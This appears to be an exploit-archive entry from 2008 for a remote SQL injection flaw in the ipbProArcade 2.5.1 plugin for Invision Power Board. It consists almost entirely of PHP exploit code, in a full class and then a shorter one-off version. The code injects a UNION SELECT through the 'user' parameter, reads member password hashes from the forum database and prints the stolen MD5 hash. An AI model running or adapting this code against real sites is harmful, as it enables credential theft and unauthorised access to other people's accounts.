ipbProArcade 2.5.1 (user) Remote SQL Injection Exploit

2008-06-03 00:00:00

<pre>
<?php

/**
* @author Pr0xY
* @copyright 2008
*/

class Injection
{
var $inject;
var $Asite;
var $Isite;

function Injection($address, $id)
{
$this->inject = "index.php?act=Arcade&module=report&user=-{$id}%20union%20select%20password%20from%20ibf_members%20where%20id={$id}";
$this->Asite = $address;
}

function getTheHash()
{
$html = file_get_contents($this->Asite.$this->inject);
preg_match_all('/(colspan=\"5\"\>)(.*)(\S*)(\S*)/',$html, $hash);

$md5 = preg_replace("/[^a-zA-Z0-9]/", "", $hash[2][0]);
$md5 = preg_replace("/(\S{32})(td)/", "$1", $md5);

if(strlen($md5) == 32)
echo "The system hacked : <b>{$md5}</b>";
else
echo "Error";
}

}

$y0n1 = new Injection("", 1);
$y0n1->getTheHash();

?>
</pre>

The short code :

$a = "";
$i = 1;

$inject = "index.php?act=Arcade&module=report&user=-{$i}%20union%20select%20password%20from%20ibf_members%20where%20id={$i}";

$html = file_get_contents($a.$inject);
preg_match_all('/(colspan=\"5\"\>)(.*)(\S*)(\S*)/',$html, $hash);

$md5 = preg_replace("/[^a-zA-Z0-9]/", "", $hash[2][0]);
$md5 = preg_replace("/(\S{32})(td)/", "$1", $md5);

echo $md5;

#

Fixes

No fixes

In order to submit a new fix you need to be registered.